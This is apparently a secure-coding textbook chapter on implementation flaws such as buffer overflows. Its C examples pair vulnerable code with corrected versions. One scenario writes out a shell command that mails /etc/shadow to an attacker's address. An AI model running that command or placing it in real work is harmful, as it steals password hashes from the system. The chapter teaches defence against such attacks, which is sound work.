Chapter 4. Implementation


Your knowledge is of a meager and unsatisfactory kind; it may be the beginning of knowledge but you have scarcely in your thoughts advanced to the state of science.

William Thomson, Lord Kelvin, On Measurement, 1894

An implementation flaw is a mistake made while writing the software; most, though not all, implementation flaws are coding flaws per se. In our view, implementation flaws typically arise because the programmer is either unfamiliar with secure coding techniques or unwilling to take the trouble to apply them. (No doubt because we like to believe the best in human nature, we think it's much rarer that someone tries hard and fails to successfully write secure code.)

Looking back to the example of the SYN flood attacks, there were certainly implementation flaws in addition to the principal design flaw that led to the attacks. For example, when the array of TCP sockets became exhausted, some operating systems at the time simply crashed: the software attempted to store a value beyond the bounds of the array, overwriting memory. At the very least, a carefully implemented TCP stack could have prevented such catastrophic failure of the operating systems.
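
To make the distinction concrete, here is a minimal sketch in C. It is our own illustration, not actual TCP stack code: a hypothetical fixed-size connection table, shown first without and then with the bounds check that graceful failure requires.

    #define MAX_CONNS 128

    struct conn { int state; /* ... */ };
    static struct conn table[MAX_CONNS];
    static int n_conns = 0;

    /* Flawed: once the table is full, the store lands past the end
     * of table[]; in an operating system kernel, a likely crash. */
    void add_conn_flawed(int state)
    {
        table[n_conns++].state = state;    /* no bounds check */
    }

    /* Careful: refuse the connection rather than corrupt memory. */
    int add_conn(int state)
    {
        if (n_conns >= MAX_CONNS)
            return -1;                     /* fail gracefully */
        table[n_conns++].state = state;
        return 0;
    }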

Source code is the final stage in the translation of a design into something users can use, before the software is subjected to testing and (eventually) production. Flaws in source code therefore have a direct link to the user base; because the machine translation of the source code is exactly what gets executed by the computer at production time, there is no margin for error here. Even a superbly designed program or module can be rendered insecure by a programmer who makes a mistake during this last crucial step.

Consider a simple example of a programming error in a web-based shopping cart. Imagine that an otherwise flawlessly designed and implemented program inverts a Euro-to-dollar currency conversion algorithm, so that a person paying with Euros ends up getting a 20% discount on goods purchased. Needless to say, when the first European makes a purchase and reviews the bill, a flood of gleeful purchases from Europe will ensue.
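
To make the mistake concrete, here is a minimal sketch in C. The rate, the dollar figures, and the function names are all our own invention, not taken from any real shopping cart; the size of the accidental discount depends on the rate chosen.

    #include <stdio.h>

    #define USD_PER_EUR 1.25    /* hypothetical exchange rate */

    /* Intended: convert Euros to dollars by multiplying by the rate. */
    double eur_to_usd(double eur)
    {
        return eur * USD_PER_EUR;
    }

    /* The flaw: dividing instead of multiplying inverts the
     * conversion. At this rate, a 100-Euro purchase bills as
     * $80.00 instead of $125.00. */
    double eur_to_usd_flawed(double eur)
    {
        return eur / USD_PER_EUR;
    }

    int main(void)
    {
        printf("correct: $%.2f   flawed: $%.2f\n",
               eur_to_usd(100.0), eur_to_usd_flawed(100.0));
        return 0;
    }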

This trivialized example points out how a human mistake in the programming process (an implementation flaw) can result in serious business problems for the person or company running the flawed software.

Now, let's put this into the context of a security issue. The classic example of an implementation security flaw is the buffer overflow. We discuss such flaws later in this chapter (see the sidebar "Buffer Overflows"), but for now, we simply provide a quick overview and look at how buffer-overflow flaws can be introduced into a software product.

A buffer overflow occurs when a program accepts more input than it has allocated space for. In the types of cases that make the news, a serious vulnerability results when the program receives unchecked input data from a user (or some other data input source). The results can range from the program's crashing (usually ungracefully) to an attacker's being able to execute an arbitrary program or command on the victim's computer, often attaining privileged access in the process.
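
As a minimal illustration (our own sketch, not code from any shipping product), consider a C routine that reads a name into a fixed-size buffer. The unsafe call reads input with no idea of the buffer's size; the safer one is told exactly how much room it has.

    #include <stdio.h>

    int main(void)
    {
        char name[16];      /* room for 15 characters plus the '\0' */

        /* Unsafe: gets() has no idea how big name[] is, so 16 or
         * more characters of input write past the end of the
         * buffer. (It was so dangerous it was eventually removed
         * from the C standard in C11.)
         *
         *     gets(name);
         */

        /* Safer: fgets() is told the buffer size and stops there. */
        if (fgets(name, sizeof(name), stdin) != NULL)
            printf("hello, %s", name);
        return 0;
    }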

Thinking back to our shopping cart and Euro-to-dollar conversion example, let's consider how a buffer-overflow situation might play out in the same software. In addition to committing the monetary conversion flaw, the coders who wrote this software neglected to adequately screen user input data. In this hypothetical example, the developer assumed that the maximum quantity of any single item purchased in the shopping cart would be 999 (that is, 3 digits). So, in writing the code, space for only 3 digits of input data is allocated. However, a malicious-minded user looking at the site decides to see what will happen if he enters, say, a quantity of 10 to 25 digits. If the application doesn't properly screen this input and instead passes it to the back-end database, it is possible that either the middleware software (perhaps PHP or some other common middleware language) or the back-end database running the application will crash.
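
Here is a sketch of that hypothetical quantity field in C (the identifiers are ours, chosen for illustration): the first version trusts the 3-digit assumption, while the second enforces it before anything reaches the back end.

    #include <stdio.h>
    #include <stdlib.h>

    /* Flawed: trusts the 3-digit assumption. A fourth character of
     * input already overruns qty[]. */
    void read_quantity_flawed(void)
    {
        char qty[4];                /* "999" plus '\0': the assumption */
        if (scanf("%s", qty) != 1)  /* no field width: unbounded copy */
            return;
    }

    /* Safer: read a bounded line, then validate before use. */
    long read_quantity(void)
    {
        char line[32], *end;
        if (fgets(line, sizeof(line), stdin) == NULL)
            return -1;
        long q = strtol(line, &end, 10);
        if (end == line || q < 1 || q > 999)
            return -1;              /* reject rather than pass it along */
        return q;
    }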

Take this scenario one step further now. Our attacker has a copy of the software running in his own environment, and he analyzes it quite carefully. In looking over the application code, he discovers that the buffer-overflow situation actually results in a portion of the user input field spilling into the CPU's stack and, under certain circumstances, being executed. If the attacker carefully generates an input stream that includes some chosen text (for example, #!/bin/sh Mail bob@attack.com < /etc/shadow), then it's possible that the command could get run on the web server computer.
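
Why can input end up being executed at all? On many platforms, a function's local buffer lives on the stack a short distance from the saved return address, so a long enough write can replace that address. The sketch below is illustrative only; exact layouts vary by compiler, platform, and calling convention.

    #include <string.h>

    void handle_request(const char *input)
    {
        char buf[64];
        /* A typical stack frame, illustrative only:
         *
         *     higher addresses
         *     +----------------------+
         *     | saved return address |  <- eventually overwritten
         *     | saved frame pointer  |
         *     | buf[0] .. buf[63]    |  <- overflow begins here
         *     +----------------------+
         *     lower addresses
         *
         * With no length check, attacker-supplied bytes run past
         * buf[], replace the return address, and redirect execution
         * into the attacker's own input when the function returns. */
        strcpy(buf, input);   /* the entire vulnerability in one line */
    }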

Not likely, you say? That's exactly how Robert T. Morris's Internet worm duped the Berkeley Unix finger daemon into running a command and copying itself to each new victim computer back in early November of 1988.

Buffer Overflows

Buffer-overflow disasters have been so widespread in modern software that they were the primary factor convincing us to write this book. Indeed, we could fill a good-sized volume with sad security tales on this topic alone. Go see for yourself; take a look at the security patches released by software vendors over just about any several-month period in the past few years. You will find that a huge percentage of the patches relate to vulnerabilities with buffer overflows as their root cause. We believe that every one of these implementation flaws was avoidable, and without a great deal of effort on the parts of their respective programmers.

Buffer overflows, in particular, have been commonly known and documented for years. The Internet worm [1] was one of the first documented cases of a buffer overflow exploit in action. At the very least, we should all have learned from that incident, and removed buffer overflows from any and all software written since that time.

It's also only fair to note here that some operating systems provide internal protection against buffer overflows, thus relieving the programmer of the burden of having to write code that prevents them. (The fact that some of the most popular operating systems do not provide this type of protection probably doesn't speak well for our selection criteria!)
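
The usual mechanism is a "canary": a value placed between a function's local variables and its saved return address and checked before the function returns. The C version below is a toy that conveys the idea only; real implementations (GCC's -fstack-protector, for example) are provided by the compiler and runtime rather than written by hand, and use a randomized canary value.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    static const long CANARY = 0x5AFE5AFEL;  /* randomized in real life */

    void copy_guarded(const char *input)
    {
        char buf[64];
        long canary = CANARY;   /* assume it sits just past buf[] */

        strcpy(buf, input);     /* the still-unchecked copy */

        /* A linear overflow of buf[] must trample the canary before
         * it can reach anything beyond it; detect that and abort
         * rather than return through a corrupted stack frame. */
        if (canary != CANARY) {
            fprintf(stderr, "stack smashing detected\n");
            abort();
        }
    }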

[1] Eugene H. Spafford, "Crisis and Aftermath," Communications of the ACM, Vol. 32, No. 6, June 1989, pp. 678-687.

In the remainder of this chapter, we discuss ways to fight buffer overflows and other types of implementation flaws. The good news for you is that, although implementation flaws can have major adverse consequences, they are generally far easier than design flaws both to detect and to remedy. Various tools, both commercial and open source, simplify the process of testing software code for the most common flaws (including buffer overflows) before the software is deployed into production environments.

The following sections list the implementation practices we recommend you use, as well as those we advise you to avoid.

These practices emphasize security issues and are, of course, no substitute for sound software engineering processes. We feel strongly that solid software engineering practices are vital in the development of any code; security is only one of the many reasons why. The deservedly revered Software Engineering Institute (SEI) has, for instance, been studying and writing about such issues for decades. There are some great books on this subject; we list our favorites in Appendix A.
